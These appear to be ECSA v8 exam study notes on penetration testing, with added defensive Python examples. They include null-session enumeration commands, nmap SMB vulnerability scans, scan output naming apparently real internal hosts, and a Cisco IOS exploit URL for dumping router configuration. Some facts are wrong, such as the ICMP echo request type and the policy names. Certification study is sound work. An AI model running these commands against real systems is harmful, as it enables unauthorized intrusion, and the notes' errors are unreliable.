SAnalysis-0001- ECSAV8

Oct 13, 2015

Manju Devaraj

Rough Hints to ECSA v8
  • Rough hints v8

    ECSA V8 key Learnings Hints for Exam

    [email protected] Hints Manju Devaraj

    ECSA v8

    Key learnings / take-aways for the exam

    By: Manju Devaraj

    Data leaks -> Rogue Employee & Insider Attacker

    More than 75% of Budget --> is Non IT/Security

    Core focus in IT security -> AAA, CIA & non-repudiation.

    Risk = loss * exposure factor

    Idle scan - packet sent to a zombie computer's open port; packet with IP ID 31400, response will be 31401.

    Metamorphic virus - code rewrites itself & signature changes, but functionality stays the same.

    Policies - promiscuous policy, permissive policy, prudent policy, paranoid policy.

    Prudent security policy provides max security: all services are blocked, nothing is allowed, everything is logged.

    Permissive security policy begins wide open; known dangers & attacks are blocked; impossible to keep up with current exploits.

    Port nos. above 1024 are registered for vendor-specific applications.

    Up to 1024 are well-known ports.

    Positive acknowledgement with retransmission guarantees reliable delivery of data.

    Windowing improves flow control & reliability.

    TCP header fields, IDS, NIDS, IP fragmentation: to be prepared.

    DoS SYN flooding takes advantage of a flaw in how hosts implement the 3-way handshake.

    IDS evasion techniques are modifications made to an attack in order to prevent detection by an IDS.

    WIDS monitors & evaluates user & system activities, identifies known attacks, determines abnormal activity, determines abnormal network activity, policy violations over WLAN, spoofing & MITM attacks.

    Password cracking attacks


    Dictionary - dictionary db loaded.

    Brute force - tries every combination.

    Hybrid - works like dictionary but adds some nos. & symbols to words in the dictionary.

    Syllable - combination of brute force & dictionary.

    Rule based - used when the attacker gets some info about the password.

    ____________________________

    Passwords are hashed & stored in the SAM, located in windows\system32\config\SAM

    Linux: /etc/passwd or /etc/shadow

    Rainbow tables contain pre-computed hashes of passwords (a precompiled hash table).
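Added illustration of why a rainbow table works against unsalted hashes and not against salted ones (example code written for these notes, not the author's material): a tiny precomputed table of unsalted SHA-256 digests is built from a constructed wordlist, a single lookup recovers an unsalted hash, and the same password stored with PBKDF2 and a random per-user salt matches nothing in the table. The wordlist, the iteration count and the `salt$hash` storage format are assumptions of the example.

```python
import hashlib
import hmac
import os

# Constructed sample wordlist standing in for the dictionary a precomputed
# (rainbow-style) table is built from; not data from the original notes.
WORDLIST = ["password", "letmein", "summer2015", "qwerty"]

PBKDF2_ITERATIONS = 100_000  # assumed work factor for the demonstration


def build_precomputed_table(words):
    """Precompute unsalted SHA-256 digests so a hash can be reversed by lookup."""
    return {hashlib.sha256(w.encode()).hexdigest(): w for w in words}


def unsalted_hash(password):
    """What a naive password store does: one digest per password, no salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def lookup_precomputed(table, digest):
    """Return the plaintext if the digest was precomputed, else None."""
    return table.get(digest)


def salted_hash(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; stored as 'salthex$dkhex'."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${dk.hex()}"


def verify_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo(password="letmein"):
    """Contrast a precomputed-table hit on an unsalted hash with a salted store."""
    table = build_precomputed_table(WORDLIST)
    recovered = lookup_precomputed(table, unsalted_hash(password))
    stored_a = salted_hash(password)
    stored_b = salted_hash(password)  # a second user with the same password
    return {
        "unsalted_recovered": recovered,               # table lookup succeeds
        "salted_values_differ": stored_a != stored_b,  # per-user salt: distinct hashes
        "salted_in_table": lookup_precomputed(table, stored_a.split("$", 1)[1]) is not None,
        "salted_verifies": verify_salted(password, stored_a),
        "wrong_password_rejected": not verify_salted("Letmein", stored_a),
    }
```

The point of `salted_values_differ` is that a table would have to be precomputed per salt, which removes the precomputation advantage entirely; the iteration count then makes each guess expensive on top of that.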

    Social engineering types

    Vishing - scamming users into surrendering private info using telephone lines.

    Dumpster diving - searching for info in disposal areas, yet to be destroyed.

    Shoulder surfing - looking over a shoulder to gain/gather info.

    Phishing - using fake websites to redirect; emails contain suspicious attachments.

    Accomplice method - associated with bribing, handing out gifts, personally involving oneself to become a friend.

    Identity theft - stealing your name or personal info for fraudulent purposes.

    Web 2.0 provides more attack surface for web exploitation; SQL injection is the biggest threat to Web 2.0.

    Web spidering tools like Burp Suite are used to mirror a target website.

    Web parameter tampering attack involves manipulation of parameters exchanged between client & server in order to modify application data such as user credentials & permissions, price & quantity of products. The best way to protect web applications from this is to apply effective input field filtering.

    SQL injection takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application.
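Added example (not from the original notes): the two web input problems described above, each beside its fix, in Python with an in-memory SQLite database. `login_vulnerable` builds the query text from raw input; `login_safe` binds the same input as parameters. `order_total_vulnerable` trusts a client-posted price; `order_total_safe` looks the price up server-side and range-checks the quantity. The schema, sample rows and form field names are constructed for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed sample schema (not from the notes): one user, one product."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret', 'user')")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, price REAL)")
    conn.execute("INSERT INTO products VALUES (42, 19.99)")
    return conn


def login_vulnerable(conn, name, password):
    """Builds the SQL text from raw input, so the input is parsed as SQL."""
    sql = f"SELECT role FROM users WHERE name = '{name}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Parameterised query: the driver binds input as data, never as SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchone()
    return row[0] if row else None


def order_total_vulnerable(form):
    """Trusts a client-supplied price (e.g. a hidden form field): tamperable."""
    return round(float(form["price"]) * int(form["qty"]), 2)


def order_total_safe(conn, form):
    """Only product id and quantity come from the client; the price is looked up
    server-side and the quantity is range-checked."""
    qty = int(form["qty"])
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    row = conn.execute(
        "SELECT price FROM products WHERE id = ?", (int(form["product_id"]),)
    ).fetchone()
    if row is None:
        raise ValueError("unknown product")
    return round(row[0] * qty, 2)
```

Input filtering, as the notes recommend, is a useful extra layer; the structural fix is that nothing security-relevant (price, role, query structure) is ever derived from the client's text.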

    LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate LDAP queries.
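Added example, not part of the original notes: the LDAP counterpart of a parameterised query is escaping the value per RFC 4515 before it is placed in the filter string. `login_filter_vulnerable` concatenates raw input; `login_filter_safe` escapes the filter metacharacters so the value can only match literally. The filter shape and the `count_uid_assertions` helper are this example's own devices for showing the difference.

```python
# Escape table from RFC 4515 (string representation of LDAP search filters).
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    """Escape a user-supplied value before it is placed inside an LDAP filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_vulnerable(username):
    """Concatenates raw input: filter metacharacters in the input change the query."""
    return f"(&(uid={username})(objectClass=person))"


def login_filter_safe(username):
    """Same filter with the value escaped, so it can only ever match literally."""
    return f"(&(uid={escape_filter_value(username)})(objectClass=person))"


def count_uid_assertions(ldap_filter):
    """Crude shape check used here: how many '(uid=' assertions the filter contains."""
    return ldap_filter.count("(uid=")
```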

    In a SOAP injection attack, the attacker injects malicious query strings into the user field to bypass service authentication mechanisms & access the backend db.

    Functional testing falls within the scope of black box testing; it is not required to have knowledge of the inner design of the code or logic.

    SQL injection Vulnerabilities:

    Detect SQL injection issues

    Detect input Sanitization

    Detect Truncation issues

    Detect SQL modification issues

    Challenges to IT security:

    Environment complexity - insecure network design, multivendor environment.

    New technologies - tunnels to bypass access controls.

    New threats & exploits - on average, a new threat is discovered every 4 hours.

    Limited focus on security.

    Limited security expertise.

    Environmental Complexity

    firewalk

    Tries to discover firewall rules using an IP TTL expiration technique known as firewalking.

    nmap --script=firewalk --traceroute 64.54.40.3.2

    nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1

    nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms

    While doing a pen test, create a log of all actions, results & findings.


    HTTP/1.1 error page msg code 407 -> Proxy Authentication Required

    ICMP

    Type 3 Code 3 -> Dest port unreachable

    Type 3 Code 2 -> Dest protocol unreachable

    Type 3 code 13 -> administratively blocked

    Type 0 Code 0 - echo reply

    Type 0 code 8 - Echo Request

    Codes:

    0 Net Unreachable

    1 Host Unreachable

    2 Protocol Unreachable

    3 Port Unreachable

    4 Fragmentation Needed and Don't Fragment was Set

    5 Source Route Failed

    6 Destination Network Unknown

    7 Destination Host Unknown
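Added example, not part of the original notes: a small builder/parser for ICMP messages that names the type/code pairs listed above (plus the administratively-prohibited codes 9 and 10) and verifies the RFC 1071 checksum before trusting the fields, which is what a firewall-log or packet-capture review needs. Message contents are constructed; the `filtered` and `admin_prohibited` labels are this example's own reading of how a scanner and a defender interpret those codes.

```python
import struct

# Type and code names from RFC 792 / RFC 1122, the subset these notes mention.
ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 8: "Echo Request", 11: "Time Exceeded"}
UNREACHABLE_CODES = {
    0: "Net Unreachable", 1: "Host Unreachable", 2: "Protocol Unreachable",
    3: "Port Unreachable", 4: "Fragmentation Needed and Don't Fragment was Set",
    5: "Source Route Failed", 6: "Destination Network Unknown",
    7: "Destination Host Unknown", 9: "Network Administratively Prohibited",
    10: "Host Administratively Prohibited", 13: "Communication Administratively Prohibited",
}
# Unreachable codes that make a port scanner report a probed port as "filtered".
FILTERED_CODES = {1, 2, 3, 9, 10, 13}


def icmp_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return (~total) & 0xFFFF


def build_icmp(icmp_type, code, rest=0, payload=b""):
    """Constructed ICMP message: 8-byte header (type, code, checksum, 4-byte rest) + payload."""
    header = struct.pack("!BBHI", icmp_type, code, 0, rest)
    checksum = icmp_checksum(header + payload)
    return struct.pack("!BBHI", icmp_type, code, checksum, rest) + payload


def classify_icmp(message):
    """Parse an ICMP message and name its type/code; rejects a bad checksum first."""
    if len(message) < 8:
        raise ValueError("ICMP header is at least 8 bytes")
    icmp_type, code, checksum = struct.unpack("!BBH", message[:4])
    zeroed = message[:2] + b"\x00\x00" + message[4:]
    if icmp_checksum(zeroed) != checksum:
        return {"valid": False, "type": icmp_type, "code": code}
    code_name = UNREACHABLE_CODES.get(code, "unknown") if icmp_type == 3 else ""
    return {
        "valid": True,
        "type": icmp_type,
        "code": code,
        "type_name": ICMP_TYPES.get(icmp_type, "unknown"),
        "code_name": code_name,
        # A scanner records these as "filtered"; to a defender they show that a
        # filtering device, not the host, answered the probe.
        "filtered": icmp_type == 3 and code in FILTERED_CODES,
        "admin_prohibited": icmp_type == 3 and code in (9, 10, 13),
    }
```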

    Pentest is actively evaluating the security of an information system or network by simulating an attack. Goes one step further than vulnerability testing; adopts in-depth ethical hacking.

    Blue team - test run with the knowledge of the org's IT staff.

    Red team - pentest run without the knowledge of (informing) the IT staff, but with the consent of upper mgmt.

    Pen testing types

    Black box - blind testing & double blind - no knowledge of infra. beforehand.

    White box - announced & unannounced - has complete knowledge of infra.

    Grey box - combination of black box & unannounced testing - limited knowledge.

    Pen Test Phases


    Pre-attack phase - passive reconnaissance & active reconnaissance.

    Attack phase - perimeter, web application & wireless testing, etc.

    Post-attack phase - removing all files & cleaning the registry.

    Network security assessment activity in the attack phase -> identifies vulnerabilities & helps to improve the enterprise security policy.

    Application security assessment -> source code review, authorization testing, functionality testing, web penetration testing.

    Legal agreement -> scope of project & consent of the company.

    Rules of engagement/behaviour -> require signatures from both the pen tester & the company.

    Pen test pricing report -> no. of client computers/IPs to be tested, resources required, time to finish the project.

    Tiger team -> a group of people hired to give details of the vulnerabilities present in the system.

    Passive info gathering -> from public sources, e.g. using Netcraft.

    Active info gathering -> social engineering, on-site visits, face-to-face interviews & tools, e.g. using Nessus (makes too much noise).

    Nessus - scripting language is NASL, which can be used to create custom scripts.

    filetype:ppt -> finds ppts on Google

    Gramm-Leach-Bliley Act -> protects consumers' personal financial information held by financial institutions and their service providers.

    Family Educational Rights and Privacy Act (FERPA) for students.

    Active IDS - IDS cuts off your connection when running a vulnerability scan on a network.

    Google search on hackrouter.com -> will produce all sites that link to hackrouter.com.

    XMAS scan: most of the ports scanned do not give a response - ports are in open state.

    DNS zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR).

    >dig example.com axfr

    When a DNS zone transfer is allowed, you should get a complete listing of all DNS entries that have been made in the DNS server for this domain. If the DNS server doesn't allow it, you will get an error indicating that the zone transfer didn't work.


    Source & Destination port in TCP header 16 bits - > 2^16 = 65536

    Ack no./Sequence No. -> 32 Bit

    WinXP repair risk -> pressing Shift+F10 gives the user administrative rights.

    Null session hijacking

    >net use \\10.10.2.225\ipc$ "" "/user:"

    >net use

    Glean information - with a null session connection, you can now use other utilities to gather critical Windows information remotely. Dozens of tools can gather this type of information.

    net view \\10.10.2.225

    Winfo and DumpSec can gather useful information about users and configurations, such as:

    Windows domain to which the system belongs

    Security policy settings

    Local usernames

    Drive shares

    Countermeasures against null session hacks

    Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:

    139 (NetBIOS session services)

    Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's

    Restrict anonymous connections to the system. Set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value as follows:


    None: This is the default setting.

    Rely on Default Permissions (Setting 0): This setting allows the default null session connections.

    Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security

    level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as

    Walksam to garner information from the system.

    No Access without Explicit Anonymous Permissions (Setting 2): This high security setting

    prevents null session connections and system enumeration.

    Nmap vulnerability scanning

    nmap -sV --script=vulscan www.example.com


    @echo Courtesy manju Devaraj

    cd C:\Program Files\Nmap

    cmd /c nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 10.186.27.1-254 > c:\temp\10.186.27.0.txt

    nmap -iL c:\temp\ips.txt -sn -PS

    Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)

    Host is up (0.00s latency).

    MAC Address: 00:50:56:A5:1C:F5 (VMware)

    Nmap scan report for 10.186.27.5

    Host is up (0.00s latency).

    MAC Address: 00:50:56:A5:56:F4 (VMware)

    Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)

    Host is up (0.00s latency).

    MAC Address: 00:50:56:A5:75:57 (VMware)


    Nmap done: 9 IP addresses (3 hosts up) scanned in 3.25 seconds

    #########################################################

    HOST DISCOVERY:

    -PO[protocol list]: IP Protocol Ping

    -Pn: Treat all hosts as online -- skip host discovery

    ##########################################################

    nmap -iL c:\temp\ips.txt -sn -P0

    Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:46 Eastern Standard

    Nmap scan report for 10.186.27.1

    Host is up.

    Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)

    Host is up.

    Nmap scan report for 10.186.27.3

    Host is up.

    Nmap scan report for 10.186.27.4

    Host is up.

    Nmap scan report for 10.186.27.5

    Host is up.

    Nmap scan report for 10.186.27.6

    Host is up.

    Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)

    Host is up.

    Nmap scan report for 10.186.27.8

    Host is up.

    Nmap scan report for 10.186.27.9


    Host is up.

    Nmap done: 9 IP addresses (9 hosts up) scanned in 0.27 seconds

    nmap -iL c:\temp\ips.txt -P0 -sU -p139,445,139,80 -v

    C:\Program Files\Nmap>nmap -iL c:\temp\ips.txt -P0 -sU -p1-500

    Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time

    Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)

    Host is up (0.00s latency).

    Not shown: 495 closed ports

    PORT STATE SERVICE

    123/udp open|filtered ntp

    137/udp open netbios-ns

    138/udp open|filtered netbios-dgm

    161/udp open|filtered snmp

    500/udp open|filtered isakmp

    MAC Address: 00:50:56:A5:1C:F5 (VMware)

    Nmap scan report for 10.186.27.5

    Host is up (0.00s latency).

    Not shown: 493 closed ports

    PORT STATE SERVICE

    123/udp open|filtered ntp

    137/udp open netbios-ns

    138/udp open|filtered netbios-dgm

    161/udp open|filtered snmp

    162/udp open|filtered snmptrap


    445/udp open|filtered microsoft-ds

    500/udp open|filtered isakmp

    MAC Address: 00:50:56:A5:56:F4 (VMware)

    Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)

    Host is up (0.00s latency).

    Not shown: 495 closed ports

    PORT STATE SERVICE

    123/udp open|filtered ntp

    137/udp open netbios-ns

    138/udp open|filtered netbios-dgm

    161/udp open|filtered snmp

    500/udp open|filtered isakmp

    MAC Address: 00:50:56:A5:75:57 (VMware)

    Nmap done: 9 IP addresses (3 hosts up) scanned in 309.64 seconds
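Added example (not from the notes): a parser for the normal nmap output layout shown above, turning the scan-report, port and MAC lines into host records and then listing the watch-listed services (SNMP, NetBIOS, SMB) that answered open or open|filtered, which is the review a defender does on a scan like this one. The sample output is constructed with documentation addresses and made-up names; the watch-list is an assumption.

```python
import re

# Constructed sample in the same layout as the nmap output above; the addresses
# (RFC 5737 range), host names and MACs are made up, not taken from the notes.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time
Nmap scan report for fileserver.example.test (192.0.2.2)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
161/udp open|filtered snmp
MAC Address: 00:00:5E:00:53:01 (Constructed)
Nmap scan report for 192.0.2.5
Host is up (0.00s latency).
Not shown: 497 closed ports
PORT STATE SERVICE
500/udp open|filtered isakmp
MAC Address: 00:00:5E:00:53:02 (Constructed)
Nmap done: 9 IP addresses (2 hosts up) scanned in 120.00 seconds
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")
DONE_RE = re.compile(r"^Nmap done: (\d+) IP address(?:es)? \((\d+) hosts? up\)")

# Services a defender would not expect reachable from the scanning position (assumed).
WATCHLIST = {"snmp", "netbios-ns", "netbios-dgm", "microsoft-ds"}


def parse_nmap_output(text):
    """Turn normal nmap output into (host records, run summary)."""
    hosts, summary, current = [], None, None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        m = REPORT_RE.match(line)
        if m:
            name, ip = m.groups()  # ip is None when nmap printed only an address
            current = {"name": name if ip else None, "ip": ip or name,
                       "up": False, "mac": None, "ports": []}
            hosts.append(current)
            continue
        m = DONE_RE.match(line)
        if m:
            summary = {"addresses": int(m.group(1)), "hosts_up": int(m.group(2))}
            continue
        if current is None:
            continue  # banner lines before the first report
        if line.startswith("Host is up"):
            current["up"] = True
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                     "state": m.group(3), "service": m.group(4)})
            continue
        m = MAC_RE.match(line)
        if m:
            current["mac"] = m.group(1)
    return hosts, summary


def exposures(hosts, watchlist=WATCHLIST):
    """(ip, port/proto, service, state) for watch-listed services that answered open or open|filtered."""
    found = []
    for host in hosts:
        for p in host["ports"]:
            if p["service"] in watchlist and p["state"].startswith("open"):
                found.append((host["ip"], f'{p["port"]}/{p["proto"]}', p["service"], p["state"]))
    return found
```

For UDP, `open|filtered` only means no ICMP port-unreachable came back, so the list is a set of candidates to confirm, not a list of confirmed services.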

    nmap -v -sn 192.168.0.0/16 10.0.0.0/8

    nmap -v -iR 10000 -Pn -p 80

    ! -iR -> random targets

    nmap -iL c:\temp\ips.txt -P0 -sU -p1-1024 -vv -sV -O

    ! UDP scan - port range, double verbose, -sV - probe to determine version of service, -O - version of OS

    Xmas scan (-sX)

    Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

    The NULL, FIN and Xmas scan types are exactly the same in behaviour except for the TCP flags set in the probe packets. If a RST packet is received, the port is considered closed, while no response means it is open|filtered. The port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.
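Added example, not from the original notes, covering both the TCP header widths noted earlier (16-bit ports, 32-bit sequence and acknowledgement numbers) and the Xmas/NULL/FIN probe definitions above: it packs and parses a fixed 20-byte TCP header, classifies a probe from its flag bits, and flags a source that sends such probes to several ports, since those flag combinations never begin a legitimate connection. Headers and source addresses are constructed; the `min_ports` threshold is an assumption.

```python
import struct
from collections import defaultdict

TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
# src port, dst port, seq, ack, data-offset/reserved, flags, window, checksum, urgent pointer
TCP_HEADER = "!HHIIBBHHH"


def build_tcp_header(src_port, dst_port, seq, ack, flags, window=8192):
    """Constructed 20-byte TCP header without options; checksum left 0 for the demo."""
    return struct.pack(TCP_HEADER, src_port, dst_port, seq, ack, 5 << 4, flags, window, 0, 0)


def parse_tcp_header(data):
    """Decode the fixed TCP header: 16-bit ports, 32-bit seq/ack, flag bits."""
    if len(data) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    src, dst, seq, ack, off_res, flags, window, _chk, _urg = struct.unpack(TCP_HEADER, data[:20])
    return {
        "src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
        "header_len": (off_res >> 4) * 4,
        "flags": sorted(name for name, bit in TCP_FLAGS.items() if flags & bit),
        "window": window,
    }


def classify_probe(flag_names):
    """Name the probe type from its flag combination, as nmap's scan types define them."""
    flags = set(flag_names)
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"
    if not flags:
        return "null"
    if flags == {"FIN"}:
        return "fin"
    if flags == {"SYN"}:
        return "syn"
    return "other"


def detect_stealth_scans(observed, min_ports=5):
    """Flag sources that sent FIN/NULL/Xmas probes to at least min_ports distinct ports.

    observed is a list of (source_ip, raw_tcp_header) pairs as a sensor would record them.
    """
    seen = defaultdict(set)
    for src_ip, raw in observed:
        hdr = parse_tcp_header(raw)
        kind = classify_probe(hdr["flags"])
        if kind in ("xmas", "null", "fin"):
            seen[(src_ip, kind)].add(hdr["dst_port"])
    return [{"src": src, "kind": kind, "ports": len(ports)}
            for (src, kind), ports in seen.items() if len(ports) >= min_ports]
```

The threshold is deliberately low: a single FIN/NULL/Xmas probe already has no benign explanation, so counting distinct destination ports is only there to keep an occasional corrupted packet from raising an alert on its own.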

    C:\Program Files\Nmap>nmap -sR 10.186.27.12 -P0 -sT -p1-1024 -vv -sV -O


    WARNING: -sR is now an alias for -sV and activates version detection as well as RPC scan.

    Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 06:31 Eastern Standard Time

    NSE: Loaded 23 scripts for scanning.

    Initiating ARP Ping Scan at 06:31

    Scanning 10.186.27.12 [1 port]

    Completed ARP Ping Scan at 06:31, 0.06s elapsed (1 total hosts)

    Initiating Parallel DNS resolution of 1 host. at 06:31

    Completed Parallel DNS resolution of 1 host. at 06:31, 0.00s elapsed

    Initiating Connect Scan at 06:31

    Scanning 10.186.27.12 [1024 ports]

    Discovered open port 135/tcp on 10.186.27.12

    Discovered open port 445/tcp on 10.186.27.12

    Discovered open port 139/tcp on 10.186.27.12

    Completed Connect Scan at 06:32, 45.91s elapsed (1024 total ports)

    Initiating Service scan at 06:32

    Scanning 3 services on 10.186.27.12

    Completed Service scan at 06:32, 6.03s elapsed (3 services on 1 host)

    Initiating OS detection (try #1) against 10.186.27.12

    NSE: Script scanning 10.186.27.12.

    NSE: Starting runlevel 1 (of 1) scan.

    Nmap scan report for 10.186.27.12

    Host is up (0.00s latency).

    Scanned at 2013-11-13 06:31:59 Eastern Standard Time for 53s

    Not shown: 1021 filtered ports


    PORT STATE SERVICE VERSION

    135/tcp open msrpc Microsoft Windows RPC

    139/tcp open netbios-ssn

    445/tcp open netbios-ssn

    MAC Address: 00:50:56:A5:75:3A (VMware)

    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

    Device type: general purpose

    Running: Microsoft Windows 7|2008

    OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8

    OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8

    TCP/IP fingerprint:

    OS:SCAN(V=6.40%E=4%D=11/13%OT=135%CT=%CU=34426%PV=Y%DS=1%DC=D%G=N%M=005056%

    OS:TM=52836364%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I

    OS:%II=I%SS=S%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B

    OS:4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%

    OS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=

    OS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q

    OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%

    OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%

    OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%

    OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD

    OS:=G)IE(R=Y%DFI=N%T=80%CD=Z)

    Uptime guess: 7.366 days (since Tue Nov 05 21:45:37 2013)


    Network Distance: 1 hop

    TCP Sequence Prediction: Difficulty=258 (Good luck!)

    IP ID Sequence Generation: Incremental

    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Read data files from: C:\Program Files\Nmap

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

    Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds

    Raw packets sent: 17 (1.446KB) | Rcvd: 17 (1.358KB)

    C:\Program Files\Nmap>

    Form Scalpel is used for dissecting HTML forms; the tool can extract all HTML forms from pages.

    BackTrack to exploit a Cisco IOS vulnerability

    root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl

    Usage :

    perl cge.pl

    Vulnerabilities list :

    [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

    [2] - Cisco IOS Router Denial of Service Vulnerability

    [3] - Cisco IOS HTTP Auth Vulnerability

    [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

    [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

    [6] - Cisco 675 Web Administration Denial of Service Vulnerability

    [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

    [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability


    [9] - Cisco 514 UDP Flood Denial of Service Vulnerability

    [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability

    [11] - Cisco Catalyst Memory Leak Vulnerability

    [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability

    [13] - 0 Encoding IDS Bypass Vulnerability (UTF)

    [14] - Cisco IOS HTTP Denial of Service Vulnerability

    root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3

    Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...

    /level/$NUMBER/exec/show/config/cr

    where $NUMBER is an integer between 16 and 99.

    root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....

    http://10.10.0.21/level/99/exec/show/config

    Click cancel to the logon box and enter the following address:


    Information technology risk

    Risk = Threat × Vulnerability × Asset Value


    Fuzzing attack - injection technique

    A fuzzer is a program which automatically injects semi-random data into a program/stack and detects bugs.

    The fuzzing scan does just as described above; it generates totally random input for the specified request parameters for a specified number of requests, hoping to provoke some kind of unexpected behaviour. By default the generated values will be between 5 and 15 characters in length and mutated 100 times;


    Inputting a massive amount of data to crash the web application.

    Dumb fuzz testing

    Smart fuzz testing - knowing the underlying structure of the database, supply huge inputs accordingly.
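Added example (not from the notes): a dumb, mutation-based fuzzer in the spirit of the description above. It feeds 100 mutated inputs of 5 to 15 characters to a constructed toy record parser that has a latent integer-conversion bug, records every input that raises, and re-runs each finding to confirm it reproduces, which is the triage step that turns a crash into a bug report. The parser, the seed record and the edit operations are all assumptions of this example.

```python
import random
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation


def parse_record(text):
    """Constructed target (not a real product): parses 'key=value;key=value' and
    requires the 'n' field to be an integer, without validating it first."""
    fields = {}
    for item in text.split(";"):
        if "=" not in item:
            continue
        key, value = item.split("=", 1)
        fields[key] = value
    if "n" in fields:
        fields["n"] = int(fields["n"])  # latent bug: a non-numeric 'n' raises ValueError
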